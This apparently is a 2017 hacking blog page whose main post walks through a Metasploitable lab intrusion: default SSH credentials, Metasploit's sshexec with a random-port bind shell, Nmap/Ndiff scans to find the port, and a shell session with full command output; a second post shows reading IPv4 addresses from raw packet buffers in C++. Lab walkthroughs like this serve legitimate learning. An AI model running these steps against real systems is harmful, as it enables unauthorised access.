Friday, September 8, 2017
Wednesday, September 6, 2017
HACK THE PLANET ! :)
Finding shell_bind_tcp_random_port with Nmap and Ndiff
Metasploitable
We're using Metasploitable for our vulnerable host. Just boot up the VM with host-only networking enabled, and you should be good to go. In this case, Metasploitable is at
172.16.126.129.Nmap
First, we need to get a list of open ephemeral ports using Nmap. An ephemeral port is just a port that the OS assigns automatically and temporarily. Our payload will bind to one of these ports. We use a little shell magic to parse the ephemeral port range in
/proc/sys/net/ipv4/ip_local_port_range and feed it to Nmap. We also need to save the scan results to before.xml in order to use Ndiff later.root@kharak:~# nmap -Pn -T5 -n -v -p "$(sed 's/\t/-/' /proc/sys/net/ipv4/ip_local_port_range)" -oX before.xml --open --send-ip 172.16.126.129 Starting Nmap 6.00 ( http://nmap.org ) at 2014-01-02 11:59 CST Initiating SYN Stealth Scan at 11:59 Scanning 172.16.126.129 [28233 ports] Discovered open port 33395/tcp on 172.16.126.129 Discovered open port 47431/tcp on 172.16.126.129 Discovered open port 49712/tcp on 172.16.126.129 Discovered open port 51488/tcp on 172.16.126.129 Completed SYN Stealth Scan at 11:59, 0.31s elapsed (28233 total ports) Nmap scan report for 172.16.126.129 Host is up (0.00014s latency). Not shown: 28229 closed ports PORT STATE SERVICE 33395/tcp open unknown 47431/tcp open unknown 49712/tcp open unknown 51488/tcp open unknown MAC Address: 00:0C:29:3D:5A:9B (VMware) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds Raw packets sent: 28233 (1.242MB) | Rcvd: 28233 (1.129MB)
As you can see, ports
{33395,47431,49712,51488}/tcp are open in the ephemeral port range.Metasploit
Next, we need to exploit the system. We're using
exploit/multi/ssh/sshexec here, since we know that Metasploitable has SSH open with default creds msfadmin:msfadmin.
Make sure to use the payload
linux/x86/shell_bind_tcp_random_port. That's why we're here, right? :)msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) > setg RHOST 172.16.126.129
RHOST => 172.16.126.129
msf exploit(sshexec) > set USERNAME msfadmin
USERNAME => msfadmin
msf exploit(sshexec) > set PASSWORD msfadmin
PASSWORD => msfadmin
msf exploit(sshexec) > set PAYLOAD linux/x86/shell_bind_tcp_random_port
PAYLOAD => linux/x86/shell_bind_tcp_random_port
msf exploit(sshexec) > exploit
[*] 172.16.126.129:22 - Sending Bourne stager...
[*] Command Stager progress - 38.67% done (268/693 bytes)
[*] Command Stager progress - 100.00% done (693/693 bytes)
We won't get a session from this, since Metasploit doesn't know which port the payload is running on (by nature of the payload).
Nmap and Ndiff
Almost there! Now we need to scan the host again to get the new state of open ephemeral ports. We save the results to
after.xml.
After that, we can use Ndiff on
before.xml and after.xml, revealing to us the port our bind shell is on.root@kharak:~# ^before^after nmap -Pn -T5 -n -v -p "$(sed 's/\t/-/' /proc/sys/net/ipv4/ip_local_port_range)" -oX after.xml --open --send-ip 172.16.126.129 Starting Nmap 6.00 ( http://nmap.org ) at 2014-01-02 12:00 CST Initiating SYN Stealth Scan at 12:00 Scanning 172.16.126.129 [28233 ports] Discovered open port 51488/tcp on 172.16.126.129 Discovered open port 49712/tcp on 172.16.126.129 Discovered open port 33395/tcp on 172.16.126.129 Discovered open port 47431/tcp on 172.16.126.129 Discovered open port 36503/tcp on 172.16.126.129 Completed SYN Stealth Scan at 12:01, 0.27s elapsed (28233 total ports) Nmap scan report for 172.16.126.129 Host is up (0.00012s latency). Not shown: 28228 closed ports PORT STATE SERVICE 33395/tcp open unknown 36503/tcp open unknown 47431/tcp open unknown 49712/tcp open unknown 51488/tcp open unknown MAC Address: 00:0C:29:3D:5A:9B (VMware) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds Raw packets sent: 28233 (1.242MB) | Rcvd: 28233 (1.129MB) root@kharak:~# ndiff {before,after}.xml -Nmap 6.00 scan initiated Thu Jan 02 11:59:37 2014 as: nmap -Pn -T5 -n -v -p 32768-61000 -oX before.xml --open --send-ip 172.16.126.129 +Nmap 6.00 scan initiated Thu Jan 02 12:00:59 2014 as: nmap -Pn -T5 -n -v -p 32768-61000 -oX after.xml --open --send-ip 172.16.126.129 172.16.126.129, 00:0C:29:3D:5A:9B: -Not shown: 28229 closed ports +Not shown: 28228 closed ports PORT STATE SERVICE VERSION +36503/tcp open
Our bind shell is on port
36503/tcp!Metasploit
Finally, we can pop a shell with
exploit/multi/handler. Just set PAYLOAD to linux/x86/shell_bind_tcp, LPORT to the port you found with Ndiff, and hit exploit! We already set RHOST globally when we used exploit/multi/ssh/sshexec. :)msf exploit(sshexec) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(handler) > set LPORT 36503
LPORT => 36503
msf exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (172.16.126.1:41368 -> 172.16.126.129:36503) at 2014-01-02 12:01:39 -0600
id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
And there you have it! We got a shell. :D
And there you have it! We got a shell. :D
Conclusion
If you're new to Metasploit and want to try your hand at some awesome hax, you can download it here. Hack the planet!
Tuesday, September 5, 2017
MIM'S - Extract IP address from buffer in C++ (Linux sockets)
Yes, you can read IP address from the raw packet buffer. Of course only if there is an IP address in the packet. The data stored in the
in_buffer contains complete packet including IP header if the protocol is IP.
Note the received data may contain any protocol. It can be IPv4 and then you can find IP addresses there but it can be IPv6 or even more obscure protocol without IP addresses.
Let assume the received packet is an
Ethernet-II packet containing IPv4 data. Then you can easily get IP addresses: // Source addr
printf("%d.%d.%d.%d", (unsigned char)(in_buffer[26]),
(unsigned char)(in_buffer[27]),
(unsigned char)(in_buffer[28]),
(unsigned char)(in_buffer[29]));
// Destination addr
printf("%d.%d.%d.%d", (unsigned char)(in_buffer[30]),
(unsigned char)(in_buffer[31]),
(unsigned char)(in_buffer[32]),
(unsigned char)(in_buffer[33]));
Sure it is not nice and you need check if the buffer contains what is expected but it is up to you.
And what does the magic number means 26 - 32?
The Ethernet II header has size 14 bytes. First 6 bytes are destination MAC, next 6 bytes are source MAC and the last 2 bytes ethertype. Ethertype 0x0800 means the data contain IPv4. The source IPv4 address is at offset 12 in IP header and the destination IP is at offset 16. So the magic number 26 means offset from packet begin and its 14(ethernetHeaderSize) + 12(offsetInIPHeader).
Subscribe to:
Posts (Atom)
